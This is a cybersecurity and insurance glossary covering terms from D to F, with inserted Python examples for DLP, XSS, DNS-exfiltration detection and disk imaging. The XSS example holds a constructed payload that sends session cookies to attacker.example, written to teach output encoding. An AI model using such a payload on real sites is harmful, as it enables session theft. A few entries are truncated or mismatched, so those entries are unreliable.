A data element is a basic unit of information that has a unique meaning and subcategories (data items) of distinct value. Gender, race, and geographic location are all examples of data elements.
Data Encryption Standard
The Data Encryption Standard (DES) is a symmetric-key block cipher that uses the same 56-bit key to encrypt and decrypt 64-bit blocks of data. Its key is far too short for modern hardware (a DES key was brute-forced in under a day in 1999), it was withdrawn as a U.S. standard in 2005, and it survives only as Triple DES, itself deprecated; AES is its replacement.
Data Flow Control
Data flow control is another term for information flow control.
Data Integrity
Data integrity is the maintenance of, and the assurance of, the accuracy and consistency of, the data.
Data Leakage
Data leakage is the unauthorized exposure of information. It can result in data theft or data loss.
Data Loss
Data loss is the result of the accidental misplacement of data, rather than its deliberate theft.
Data Loss Prevention (DLP)
the set of security controls and processes for detecting and preventing the unauthorized transfer or exposure of sensitive data, whether by accident, by an insider, or by malware. DLP is written into the organization's policy, and the rules it enforces (content inspection, blocking or quarantining of risky transfers) apply to everyone who handles business or personal data.
Data Owner
A Data Owner is the executive or manager accountable for a set of data. The owner decides how the data is classified, who may access it and with what permissions, and is answerable for its accuracy and integrity.
Data protection
a set of methods aimed to safeguard private information from getting into the wrong hands.
Data Retention
Data Retention is the process of storing and protecting data for historical reasons and for data back up when needed. Every organization has its own rules governing data retention within the organization.
Data Theft
Data theft is the deliberate theft of information, rather than its accidental loss.
Data Transfer Device
A data transfer device is a fill device designed to securely store, transport, and transfer electronically both COMSEC and TRANSEC key. A DTD is designed to be backward compatible with the previous generation of COMSEC common fill devices, and programmable to support modern mission systems.
Database
A database is a systematic collection and organization of data by individuals or organizations so that it can be easily stored, retrieved, and edited for future use.
Date of Issue
date when an insurance company issues a policy.
Decentralization
Decentralization is the process of distributing functions and authorities among different people or to different locations.
Declarations
policy statements regarding the applicant and property covered such as demographic and occupational information, property specifications and expected mileage per year.
Decryption
A process of transforming encrypted data into its original plaintext data.
Decryption Key
A decryption key is the secret value a cryptographic algorithm needs in order to convert ciphertext back into plaintext.
Deductible
Portion of the insured loss (in dollars) paid by the policy holder.
Defense-in-depth
Defense-in-depth is the concept of stacking several layers of security, so backup protection is available if one fails.
Deferred Annuity
annuity payment to be made as a single payment or a series of installments to begin at some future date, such as in a specified number of years or at a specified age.
Demilitarized Zone
A demilitarized zone (DMZ) is a separate network segment placed between an organization's internal network and an untrusted external network such as the internet. Servers that must be reachable from outside (web, mail, DNS) are placed there, so that a compromise of one of them does not give direct access to the internal network.
Demutualization
conversion of a mutual insurance company to a capital stock company.
Denial of Service Attack
A denial-of-service (DoS) attack makes a computer, service, or website unavailable to its legitimate users, typically by overwhelming it with traffic or requests, or by exploiting a flaw that crashes it.
Derivative
securities priced according to the value of other financial instruments such as commodity prices, interest rates, stock market prices, foreign or exchange rates.
Detection deficit
A detection deficit is a gap between the time an attack occurs and the time it is discovered. This term refers to the severity of attacks and how long they can cause harm undetected.
DLP
Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.
DMZ
A demilitarized zone (DMZ) is a separate network segment placed between an organization's internal network and an untrusted external network such as the internet. Servers that must be reachable from outside (web, mail, DNS) are placed there, so that a compromise of one of them does not give direct access to the internal network.
Data Loss Prevention
Data loss prevention (DLP) is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users.
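The content-inspection side of DLP, as described in the Data Loss Prevention entries above, is easiest to see in code. The following Python example is added here and is not part of the original glossary; it scans constructed outbound messages for payment card numbers, validating each candidate with the Luhn check so that ordinary 16-digit ticket numbers are not flagged, and then either redacts or blocks the message. The message texts and card numbers are constructed test data.

```python
import re

# Constructed outbound messages (test numbers only; none belongs to a real account).
SAMPLE_MESSAGES = [
    "Order 4111111111111111 confirmed, thanks!",      # 16 digits, passes Luhn
    "Ticket 1234567812345678 escalated to tier 2",     # 16 digits, fails Luhn: not a card
    "Call me on 555-0100 about the invoice",          # too short to be a card number
    "Card on file: 4012-8888-8888-1881",              # valid number with separators
]

# 13 to 19 digits, optionally separated by single spaces or hyphens, not inside a longer digit run.
CARD_PATTERN = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check, as used on payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _candidate_pan(match) -> str:
    """Return the digit string if the regex match is a plausible card number, else ''."""
    digits = re.sub(r"[ -]", "", match.group(0))
    return digits if 13 <= len(digits) <= 19 and luhn_ok(digits) else ""


def find_card_numbers(text: str) -> list:
    return [pan for pan in (_candidate_pan(m) for m in CARD_PATTERN.finditer(text)) if pan]


def redact(text: str) -> str:
    """Mask every validated card number down to its last four digits; leave other digits alone."""
    def repl(m):
        pan = _candidate_pan(m)
        return "*" * (len(pan) - 4) + pan[-4:] if pan else m.group(0)
    return CARD_PATTERN.sub(repl, text)


def inspect_outbound(messages: list) -> list:
    """DLP policy decision per message: block when a validated card number is present."""
    decisions = []
    for i, msg in enumerate(messages):
        pans = find_card_numbers(msg)
        decisions.append((i, "BLOCK" if pans else "ALLOW", pans))
    return decisions


if __name__ == "__main__":
    for index, verdict, pans in inspect_outbound(SAMPLE_MESSAGES):
        print(index, verdict, redact(SAMPLE_MESSAGES[index]))
```

The Luhn validation is what keeps the false-positive rate tolerable: a bare 16-digit regex would block the ticket number in the second message. Real DLP engines layer further signals (keywords such as "card" or "CVV" nearby, issuer prefixes, document fingerprints) on top of this kind of pattern match.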
XSS
An injection attack in which an attacker inserts a malicious script into content served by a website so that it executes in other users' browsers with the site's privileges, allowing session cookies, keystrokes or page contents to be stolen or altered.
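The Cross Site Scripting and XSS entries above describe the attack; the following Python example, added here and not taken from the original glossary, shows the server-side defect beside its fix. A vulnerable renderer interpolates a constructed attacker comment straight into HTML, the hardened one applies output encoding for the HTML body context, and a separate helper shows why encoding alone is not enough inside an `href` attribute. The attacker payload and the function names are constructed for this illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker input, as it might be submitted through a comment form.
ATTACKER_COMMENT = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates user input straight into the page: the <script> element survives
    and runs in every visitor's browser under the site's origin (stored XSS)."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_escaped(comment: str) -> str:
    """Output encoding for an HTML body context: < > & " ' become entities, so the
    browser displays the payload as text instead of parsing it as markup."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def safe_href(url: str) -> str:
    """Inside an href, entity encoding alone is not enough: javascript:alert(1)
    contains no markup characters at all. Allow only http(s) URLs and neutralize
    everything else (a malformed or unrecognized scheme falls through to '#')."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def contains_active_script(rendered: str) -> bool:
    """Crude indicator used only to contrast the two renderers above."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_vulnerable(ATTACKER_COMMENT))
    print(render_comment_escaped(ATTACKER_COMMENT))
    print(safe_href("javascript:alert(document.domain)"))
```

The point of `safe_href` is that output encoding is context-dependent: the encoding that neutralizes a payload in element content does nothing for a `javascript:` URL in an attribute, a script block, or a CSS value, each of which needs its own rule. A Content Security Policy and `HttpOnly` session cookies limit the damage when an encoding is missed.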
DDoS
Distributed Denial of Service (DDoS) is a type of denial of service (DOS) attack where multiple compromised systems are used to attack a single system causing an outage.
Device Control
Device control helps you control the use of removable storage, optical media drives and wireless networking protocols.
Digital Certificate
A Digital Certificate is an electronic document, signed by a certificate authority, that binds a public key to the identity of a person, organization, or device. It lets other parties verify that identity and exchange data securely within a public key infrastructure (PKI).
Digital Evidence
Digital evidence is electronic information stored or transferred in digital form.
Digital Forensics
Digital Forensics is the process of procuring, analyzing, and interpreting electronic data to present it as acceptable evidence in a legal proceeding in a court of law.
Direct Incurred Loss
loss whereby the proximate cause is equivalent to the insured peril.
Direct Loss
Damage to covered real or personal property caused by a covered peril.
Direct Writer
an insurance company that sells policies to the insured through salaried representatives or exclusive agents only; reinsurance companies that deal directly with ceding companies instead of using brokers.
Direct Written Premium
total premiums received by an insurance company without any adjustments for the ceding of any portion of these premiums to the Reinsurer.
Directors and Officers Liability
liability coverage protecting directors or officers of a corporation from liability arising out of the performance of their professional duties on behalf of the corporation.
Disaster
A sudden event, catastrophe caused by the forces of nature or by a human error that results in serious damage to nature, society, human life, and property. Disaster in a business or commercial sense disables an enterprise from delivering the essential tasks for a specified period; for organizations disasters may result in loss of resources, assets, including data.
Disaster Recovery Plan
A Disaster Recovery Plan (DRP) prescribes the steps required to restore IT systems and data after a disaster; it is the technology-focused part of a broader Business Continuity Plan (BCP), which covers keeping the business running as a whole. A disaster recovery plan aims to bring business activities back to normal in the shortest possible time; such efforts require an in
Discretionary Access Control
Discretionary Access Control (DAC) is an access control model in which the owner of a resource such as a file, device or directory decides which subjects (users or groups, identified by their identity) may access it and how. It is at the owner's discretion to grant permissions or to restrict users from accessing the resource completely or partially.
Disk Imaging
Disk imaging is the process of generating a bit-for-bit copy of the original media, including free space and slack space.
Disruption
A disruption is an unplanned event that causes the general system or major application to be inoperable for an unacceptable length of time (e.g., minor, or extended power outage, extended unavailable network, or equipment or facility damage or destruction).
Distributed denial of service (DDoS) attack
A DDoS, or distributed denial of service, attack occurs when a cybercriminal floods a server with traffic from many compromised systems at once to prevent users from accessing a network, site, or system.
Dividend
a refund of a portion of the premium paid by the insured from insurer surplus.
DNS
The Domain Name System (DNS) is the phone book of the Internet. It allows computers to translate website names into IP address numbers so that they can communicate with each other.
DNS Exfiltration
Domain Name System (DNS) exfiltration is the smuggling of data out of a network inside DNS traffic: the attacker encodes stolen data into the labels of DNS queries for a domain whose authoritative name server they control, so that each lookup delivers another chunk. Because DNS is almost always allowed out through firewalls and the queries look routine, the technique is hard to detect, and the data lost can range from a single credential to entire files.
DNS Hijacking
DNS hijacking is an attack that redirects name resolution so that queries for a legitimate domain return attacker-controlled addresses, for example by altering a device's resolver settings, poisoning a resolver's cache, or compromising the domain's registrar account or authoritative server.
Document Malware
Document malware takes advantage of vulnerabilities in applications that let you read or edit documents.
Domain Name Service
The Domain Name System (DNS) is the phone book of the Internet. It allows computers to translate website names into IP address numbers so that they can communicate with each other.
Domain Name System
The Domain Name System is a distributed, hierarchical database that maps human-readable domain names to the numerical IP addresses that internet hosts actually use. Because remembering the numerical addresses of many hosts is impractical, users type a domain name and DNS resolvers translate it into an IP address on every lookup.
Domain Name System Exfiltration
Domain Name System (DNS) exfiltration is the smuggling of data out of a network inside DNS traffic: the attacker encodes stolen data into the labels of DNS queries for a domain whose authoritative name server they control, so that each lookup delivers another chunk. Because DNS is almost always allowed out through firewalls and the queries look routine, the technique is hard to detect, and the data lost can range from a single credential to entire files.
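The DNS Exfiltration and Domain Name System Exfiltration entries above describe why the technique is hard to spot; the detection logic below, a Python example added here rather than taken from the original glossary, shows what it looks like in a resolver log. It profiles each zone by the number of distinct names queried under it and by the length and Shannon entropy of the first label, then flags zones where every query carries a fresh, long, hex-like label. The log lines, zone name and thresholds are constructed for this illustration.

```python
import math
from collections import defaultdict

# Constructed resolver log (fields: timestamp client qtype qname). Not real traffic: the
# hex-looking labels under exfil-example.net stand in for chunks of a stolen file.
SAMPLE_QUERY_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 A www.example.com
2024-05-01T10:00:02Z 10.0.0.5 AAAA mail.example.com
2024-05-01T10:00:03Z 10.0.0.7 A cdn.example.com
2024-05-01T10:00:04Z 10.0.0.9 TXT 4d7953514c2070617373776f7264.t1.exfil-example.net
2024-05-01T10:00:05Z 10.0.0.9 TXT 3a2073336372337421212e2e2e2e.t2.exfil-example.net
2024-05-01T10:00:06Z 10.0.0.9 TXT 9f1c0b7e55a2d4c3e8b1f0a6d2c4.t3.exfil-example.net
2024-05-01T10:00:07Z 10.0.0.9 TXT 7a3b9c1d2e4f5a6b7c8d9e0f1a2b.t4.exfil-example.net
2024-05-01T10:00:08Z 10.0.0.9 TXT b4c5d6e7f8a9b0c1d2e3f4a5b6c7.t5.exfil-example.net
2024-05-01T10:00:09Z 10.0.0.5 A www.example.com
"""


def shannon_entropy(s: str) -> float:
    """Bits per character: hex data approaches 4.0, a hostname like 'www' is 0."""
    if not s:
        return 0.0
    n = len(s)
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def parse_query_log(text: str) -> list:
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                      # skip blank or malformed lines
        ts, client, qtype, qname = parts
        records.append((ts, client, qtype.upper(), qname.lower().rstrip(".")))
    return records


def zone_of(qname: str) -> str:
    """Approximate the registered domain as the last two labels. Production code should
    use the Public Suffix List so that e.g. names under co.uk are not merged into one zone."""
    return ".".join(qname.split(".")[-2:])


def profile_zones(records: list) -> dict:
    zones = defaultdict(lambda: {"queries": 0, "names": set(), "clients": set(),
                                 "txt_queries": 0, "label_lengths": [], "entropies": []})
    for _, client, qtype, qname in records:
        z = zones[zone_of(qname)]
        first_label = qname.split(".")[0]
        z["queries"] += 1
        z["names"].add(qname)
        z["clients"].add(client)
        if qtype == "TXT":
            z["txt_queries"] += 1
        z["label_lengths"].append(len(first_label))
        z["entropies"].append(shannon_entropy(first_label))
    return zones


def flag_exfil_zones(records: list, min_unique_names: int = 5,
                     min_mean_label_len: int = 20, min_mean_entropy: float = 2.5) -> list:
    """A zone is suspicious when many distinct, long, high-entropy names are looked up
    under it: each query carries a new payload chunk, so names never repeat and cannot
    be served from cache. Thresholds are constructed for this sample and need tuning."""
    flagged = []
    for zone, st in profile_zones(records).items():
        mean_len = sum(st["label_lengths"]) / len(st["label_lengths"])
        mean_ent = sum(st["entropies"]) / len(st["entropies"])
        if (len(st["names"]) >= min_unique_names
                and mean_len >= min_mean_label_len
                and mean_ent >= min_mean_entropy):
            flagged.append(zone)
    return sorted(flagged)


if __name__ == "__main__":
    print(flag_exfil_zones(parse_query_log(SAMPLE_QUERY_LOG)))
```

Volume per client and per zone, record type mix (TXT and NULL are favoured because they carry more data back), and the ratio of unique names to total queries are the other signals usually combined with this. Blocking direct outbound UDP/53 and forcing all resolution through a logging resolver is what makes this kind of analysis possible in the first place.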
Domestic Insurer
an insurance company that is domiciled and licensed in the state in which it sells insurance.
DRP
A Disaster Recovery Plan (DRP) prescribes the steps required to restore IT systems and data after a disaster; it is the technology-focused part of a broader Business Continuity Plan (BCP), which covers keeping the business running as a whole. A disaster recovery plan aims to bring business activities back to normal in the shortest possible time; such efforts require an in
Dual Interest
Insurance that protects the creditor's and the debtor's interest in the collateral securing the debtor's credit transaction. "Dual Interest" includes insurance commonly referred to as "Limited Dual Interest."
Dual Use Certificate
A dual-use certificate is intended for use with both digital signature and data encryption services.
Due Care
Due Care is the degree of care a reasonable person would exercise in circumstances like those at hand. Also known as ordinary care or reasonable care, it is the test of whether a person acted responsibly or neglected their responsibility.
Due Diligence
Due Diligence is the process of conducting a thorough and detailed investigation, to verify the truthfulness of the information provided in the statements for analysis and review before committing to a transaction. It is a measure of prudence; a rational person would undertake before taking a final decision.
Duplicate Digital Evidence
Duplicate digital evidence is a duplicate that is an accurate digital reproduction of all data objects contained on the original physical item and associated media.
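The Disk Imaging and Duplicate Digital Evidence entries above turn on one distinction: a bit-for-bit image preserves free and slack space, a file copy does not, and the duplicate must be provably identical to the original. The Python example below, added here and not part of the original glossary, images a constructed two-cluster "disk" held in memory, verifies the image against the acquisition hash, and contrasts it with a logical copy of the one live file. The disk layout, file table and contents are constructed for this illustration.

```python
import hashlib
import io

CLUSTER = 512
# Constructed "disk" of two clusters. Cluster 0 holds a live file followed by slack
# (leftovers from an earlier file that used the same cluster); cluster 1 is marked free
# by the file system but still contains a deleted memo.
LIVE_FILE = b"quarterly report: revenue up 12%"
SLACK = b"OLD PASSWORD hunter2"
DELETED = b"deleted memo: wire 50k to acct 7"
SAMPLE_DISK = (LIVE_FILE + SLACK).ljust(CLUSTER, b"\x00") + DELETED.ljust(CLUSTER, b"\x00")
FILE_TABLE = {"report.txt": (0, len(LIVE_FILE))}   # constructed allocation: (offset, length)


def image_stream(src, dst, block_size: int = 4096) -> dict:
    """Bit-for-bit copy of src into dst, hashing the source as it is read so the image
    can later be proven identical to what was acquired."""
    h = hashlib.sha256()
    copied = 0
    while True:
        chunk = src.read(block_size)
        if not chunk:
            break
        h.update(chunk)
        dst.write(chunk)
        copied += len(chunk)
    return {"bytes": copied, "sha256": h.hexdigest()}


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_image(image: bytes, expected_sha256: str) -> bool:
    """Re-hash the duplicate and compare with the acquisition hash (chain of custody)."""
    return sha256_of(image) == expected_sha256


def acquire_and_verify(disk: bytes) -> dict:
    """Image the constructed disk into memory and verify the copy, as an examiner would
    before doing any analysis on the duplicate rather than the original."""
    dst = io.BytesIO()
    report = image_stream(io.BytesIO(disk), dst)
    image = dst.getvalue()
    report["image"] = image
    report["verified"] = verify_image(image, report["sha256"])
    return report


def logical_copy(disk: bytes, table: dict) -> bytes:
    """What a plain file copy captures: only the allocated bytes of each live file."""
    return b"".join(disk[off:off + ln] for off, ln in table.values())


if __name__ == "__main__":
    result = acquire_and_verify(SAMPLE_DISK)
    print("imaged", result["bytes"], "bytes, verified:", result["verified"])
    print("slack recoverable from image:", SLACK in result["image"])
    print("slack recoverable from file copy:", SLACK in logical_copy(SAMPLE_DISK, FILE_TABLE))
```

On real media the same loop runs against a block device opened read-only behind a write blocker, the hash is recorded at acquisition time, and analysis is done on the verified image (or a copy of it) so the original is never altered.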
Dwelling Property/Personal Liability
a special form of package policy composed of dwelling fire and/or allied lines, and personal liability insurance.
Dynamic Ports
Dynamic ports, also known as private or ephemeral ports, are the range from 49152 to 65535. They require no registration with IANA and are assigned on the fly as the source port of outgoing connections, so that any application can communicate with any other program that uses the Transmission Control Protocol (TCP) or the User Datagram Protocol (UDP).
E
E-Commerce
The process of conducting any kind of business transaction or a commercial transaction electronically with the help of the internet is termed E-commerce. The Internet enables sellers to accept orders and payments online.
E-Government
E-Government is the U.S. government use of Web-based Internet applications and other information technology.
e-signature
An electronic signature, or e-signature, refers to data in electronic form, which is logically associated with other data in electronic form and used by the signatory to sign.
Early Warning System
a system designed by insurance industry regulators to identify practices and risk-related trends that contribute to systemic risk by measuring insurer’s financial stability.
Earned but Not Reported (EBNR)
premium amount insurer reasonably expects to receive for which contracts are not yet final and exact amounts are not definite.
Earned Premium
insured prepaid premium allocated to the insurance company's loss experience, expenses, and profit year- to -date.
Easter Egg
An Easter Egg is the hidden functionality within an application program, which becomes activated when an undocumented set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening.
Eavesdropping
Eavesdropping is the practice of listening, intercepting, or monitoring private communication between users or user groups without their knowledge or permission.
EDP Policies
coverage to protect against losses arising out of damage to or destruction of electronic data processing equipment and its software.
Effective Date
date at which an insurance policy goes into force.
Egress
Egress in general means to go out; in networking it is traffic leaving a network toward an external destination through a boundary device such as a router or firewall.
Egress Filtering
Egress filtering is the filtering of outgoing network traffic, blocking or logging connections to destinations, ports or protocols that policy does not allow. It limits what malware or an intruder can reach from inside the network and can expose attempts at data exfiltration.
Electronic Key Entry
Electronic Key Entry is the entry of cryptographic keys into a cryptographic module using electronic methods such as a smart card or a key-loading device.
Electronic Key Management System
An electronic key management system is an Interoperable collection of systems being developed by services and agencies of the U.S. government to automate the planning, ordering, generating, distributing, storing, filling, using, and destroying of electronic key and management of other types of COMSEC material.
Electronic Signature
An electronic signature, or e-signature, refers to data in electronic form, which is logically associated with other data in electronic form and used by the signatory to sign.
Electronically Generated Key
An electronically generated key is a key generated in a COMSEC device by mechanically or electronically introducing a seed key into the device and then using the seed in conjunction with a software algorithm stored in the device to produce the desired key.
Elliptical Curve Cryptography
Elliptic Curve Cryptography (ECC) is a public-key technique that derives keys from points on an elliptic curve over a finite field. Its security rests on the elliptic curve discrete logarithm problem: recovering the private scalar from a public point is computationally infeasible, so ECC keys are much smaller and faster to use than RSA keys of equivalent strength (a 256-bit ECC key is comparable to a 3072-bit RSA key). As in any public-key system, the private key is kept secret while the public key is published.
Email Malware Distribution
Email malware refers to malware that is distributed via email.
Embedded Cryptography
Embedded cryptography is cryptography engineered into an equipment or system whose basic function is not cryptographic.
Employee Benefit Liability
liability protection for an employer for claims arising from provisions in an employee benefit insurance plan provided for the economic and social welfare of employees. Examples of items covered are pension plans, group life insurance, group health insurance, group disability income insurance, and accidental death and dismemberment.
Employers Liability
employers' liability coverage for the legal liability of employers arising out of injuries to employees. This code should be used when coverage is issued as an endorsement, or as part of a statutory workers' compensation policy.
Employment Practices Liability Coverage
liability insurance for employers providing coverage for wrongful termination, discrimination, or sexual harassment of the insured's current or former employees.
Encapsulating Security Payload
Encapsulating Security Payload (ESP) is the IPsec protocol that provides confidentiality, data-origin authentication, integrity and anti-replay protection for IPv4 and IPv6 packets by encrypting the packet payload and appending an integrity check value. ESP does not protect the outer IP header, which stays visible so that the packet can still be routed.
Encipher
To encipher is to convert plain text to cipher text via a cryptographic system.
Encode
To convert into a coded form.
Encryption
Encryption is a method by which plaintext (or any other type of readable data) is converted into an encoded form that can only be decoded by another entity that holds the decryption key. Encryption is an excellent way to secure data transmitted across networks.
Encryption Algorithm
An encryption algorithm is a set of mathematically expressed rules for rendering data unintelligible by executing a series of conversions controlled by a key.
Encryption Certificate
An encryption certificate is one containing a public key used to encrypt electronic messages, files, documents, or data transmissions, or to establish or exchange a session key for these same purposes.
Encryption Key
An encryption key is a code of variable value, produced with the help of an encryption algorithm, that is used to encrypt and decrypt information.
End Cryptographic Unit
An end cryptographic unit is a device that (1) performs cryptographic functions, (2) typically is part of a larger system for which the device provides security services, and (3) from the viewpoint of a supporting security infrastructure (e.g., a key management system), is the lowest level of identifiable component with which a management transaction can be conducted.
End-to-End Encryption
End-to-end encryption describes communications encryption in which data is encrypted when passing through a network with the routing information still visible.
Endorsement
An amendment or rider to a policy adjusting the coverages and taking precedence over the general contract.
Endpoint
In cybersecurity, an endpoint is a physical device connected to a computer network. Examples of endpoint devices include mobile devices, desktop computers, and embedded systems.
Endpoint detection and response (EDR) or endpoint threat detection and response (ETDR)
These cybersecurity acronyms are used to describe a solution that continuously monitors and mitigates potential threats in endpoint devices.
Endpoint Security
Endpoint security or Endpoint Protection is the process of securing the various endpoints on a network.
Enrollment
The total number of plans, not the total number of covered lives, provides coverage to the enrollee and their dependents.
Enterprise
An enterprise is an organization with a defined mission/goal and a defined boundary, using information systems to execute that mission, and with responsibility for managing its own risks and performance. An enterprise may consist of all or some of the following business aspects: acquisition, program management, financial management (e.g., budgets), human resources, security, and information systems, information, and mission management.
Enterprise Architecture
The enterprise architecture is the description of an enterprise’s entire set of information systems: configuration, integration and how they interface. Enterprise architecture also describes how they are operated to support the enterprise mission, and how they contribute to the enterprise’s overall security posture.
Entrapment
Entrapment is the deliberate planting of apparent flaws in an information system with the intent to detect attempted penetrations.
Equity Indexed Annuity
A fixed annuity that earns interest or provides benefits that are linked to an external reference or equity index, subject to a minimum guarantee.
Eradication
Eradication is an important function of the incident management process that follows the containment of an incident. Once the incident has been identified and controlled in the containment stage, eradication identifies the root cause, removes it completely from the system, and reduces the chance that the incident recurs.
Errors and Omissions Liability/ Professional Liability Other than Medical
Liability coverage of a professional or quasi-professional insured to persons who have incurred bodily injury or property damage, or who have sustained any loss from omissions arising from the performance of services for others, errors in judgment, breaches of duty, or negligent or wrongful acts in business conduct.
Ethernet
Ethernet is the most widely used Local Area Network (LAN) technology; it specifies the cabling and signaling system for home and organizational networks. Ethernet uses a bus topology to support data transfers and Carrier Sense Multiple Access with Collision Detection (CSMA/CD) so that multiple stations can share the medium when they transmit at the same time.
Ethical Hacking (white hat)
Ethical hacking is sometimes referred to as white hat hacking. It describes authorized hacking that is meant to simulate malicious hacking. Ethical hacking helps organizations identify vulnerabilities in their cybersecurity systems, protocols, and processes.
Event
An event is an action or occurrence that a program can detect. Examples of events are the click of a mouse button or the press of a key.
Evidence
Evidence is documents, records or any such objects or information that helps prove the facts in a case.
Evil twin
In cybersecurity terms, an evil twin refers to a fraudulent Wi-Fi access point (AP). An evil twin attack occurs when someone disguises a fraudulent Wi-Fi AP as legitimate by mimicking a legitimate Wi-Fi’s network name and settings. Connecting to this network allows the attacker to eavesdrop and steal sensitive data.
Excess and Umbrella Liability
Liability coverage of an insured above a specific amount set forth in a basic policy issued by the primary insurer; or a self-insurer for losses over a stated amount; or an insured or self-insurer for known or unknown gaps in basic coverages or self-insured retentions.
Excess of Reinsurance
Loss-sharing mechanism where an insurer pays all claims up to a specified amount and a reinsurance company pays any claims in excess of the stated amount.
Excess Workers’ Compensation
Either specific and/or aggregate excess workers' compensation insurance written above an attachment point or self-insured retention.
Exercise Key
An exercise key is cryptographic key material used exclusively to safeguard communications transmitted over-the-air during military or organized civil training exercises.
Expense Ratio
Percentage of premium income used to attain and service policies. It was derived by subtracting related expenses from losses incurred and dividing them by written premiums.
Experience Rating
Rating system where each group is rated entirely based on its own expected claims in the coming period, with retrospective adjustments for prior periods. This method is prohibited under the conditions for federal qualification.
Exploit
An exploit is an attack on a computer system, especially one that takes advantage of a particular vulnerability the system offers to intruders.
Exploit Code
Exploit code is a program that allows attackers to automatically break into a system.
Exploitable Channel
An exploitable channel is a channel that allows the violation of the security policy governing an information system and is usable or detectable by subjects external to the trusted computing base.
Exploitable Network
An external network is a network not controlled by the organization.
Exposure
Risk of possible loss.
External Security Testing
External security testing is security testing conducted from outside the organization’s security perimeter.
Extra Expense Insurance
A type of property insurance for extraordinary expenses related to business interruption, such as a back-up generator in case of power failure.
F
Face Amount
The value of a policy to be provided upon maturity date or death.
Facultative Reinsurance
Reinsurance for a specific policy for which terms can be negotiated by the original insurer and reinsurer.
Failover
Failover is the process of switching to a redundant system in the event of a system failure.
Fail Safe
Fail safe is the automatic protection of programs and/or processing systems when a hardware or software failure is detected.
Fail Soft
Fail soft is the elective termination of affected nonessential processing when hardware or software failure is determined to be imminent.
Fair Value
The amount at which an asset (or liability) could be bought (or incurred) or sold (or settled) in a current transaction between willing parties, that is, other than in a forced or liquidation sale. Quoted market prices in active markets are the best evidence of fair value and shall be used as the basis for the measurement, if available. If a quoted market price is available, the fair value is the number of trading units times the market price.
Fake Antivirus Malware
Fake antivirus malware reports non-existent threats in order to scare the user into installing malicious software and/or paying for unnecessary product registration and cleanup.
False Positive
A false positive is an alert that incorrectly indicates that malicious activity is occurring.
Farm Owners Insurance
Farm owners’ insurance sold for personal, family or household purposes. This package policy is similar to a homeowner’s policy, in that it has been developed for farms and ranches and includes both property and liability coverage for personal and business losses. Coverage includes farm dwellings and their contents, barns, stables, other farm structures and farm inland marine, such as mobile equipment and livestock.
Federal Information System
A federal information system is an information system used or operated by an executive agency, a contractor of an executive agency, or another organization on behalf of an executive agency.
Fees Payable
Fees incurred but not yet paid.
Fidelity
A bond or policy covering an employer's loss resulting from an employee's dishonest act (e.g., loss of cash, securities, valuables, etc.).
File Encryption
File encryption is the process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
File Name Anomaly
A file name anomaly is a mismatch between the internal file header and the file's external extension. It also describes a file name that is inconsistent with the content of the file (e.g., a graphics file renamed with a non-graphical extension).
File Protection
File protection is the aggregate of processes and procedures designed to inhibit unauthorized access, contamination, elimination, modification, or destruction of a file or any of its contents.
File Security
File security is the method in which access to computer files is limited to authorized users only.
FDE
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
File Transfer Protocol
The File Transfer Protocol (FTP) is a legacy network protocol used to transfer files between two endpoints. Because FTP itself provides no encryption, it has been replaced by more secure alternatives such as Secure File Transfer Protocol (SFTP), which encrypts the transfer.
Fill Device
A fill device is a COMSEC item used to transfer or store keys in electronic form or to insert keys into cryptographic equipment.
Financial Guaranty
A surety bond, insurance policy, or indemnity contract (when issued by an insurer), or similar guaranty type under which loss is payable upon proof of occurrence of financial loss to an insured claimant, obligee or indemnitee as a result of failure to perform a financial obligation, or any other permissible product that is defined as or determined to be financial guaranty insurance.
Financial Reporting
Insurance companies must maintain records and file annual and quarterly financial statements with regulators in accordance with statutory accounting principles (SAP). Statutory rules also govern how insurers should establish reserves for invested assets and claims and the conditions under which they can claim credit for reinsurance ceded.
Financial Responsibility Law
A statute requiring motorists to show capacity to pay for automobile-related losses.
Financial Statement
Balance sheet and profit and loss statement of an insurance company. This statement is used by the NAIC and by state insurance commissioners to regulate an insurance company according to reserve requirements, assets, and other liabilities.
Firewall
A firewall is a network security device that monitors incoming and outgoing network traffic and makes decisions whether to allow or block specific traffic based on a defined set of rules.
Firewall Control Proxy
A firewall control proxy is the component that controls a firewall’s handling of a call. The firewall control proxy can instruct the firewall to open specific ports that are needed by a call and direct the firewall to close these ports at call termination.
Firmware
Firmware consists of the programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution.
Flaw Hypothesis Methodology
Flaw Hypothesis Methodology is the system analysis and penetration technique in which the specification and documentation for an information system are analyzed to produce a list of hypothetical flaws. This list is prioritized based on the estimated probability that a flaw exists, the ease of exploiting it, and the extent of control or compromise it would provide. The prioritized list is used to perform penetration testing of a system.
Flooding
Flooding is an attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Focused Testing
Focused Testing is a test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Focused testing is also known as gray box testing.
Foreign Insurer
An insurance company selling policies in a state other than the state in which it is incorporated or domiciled.
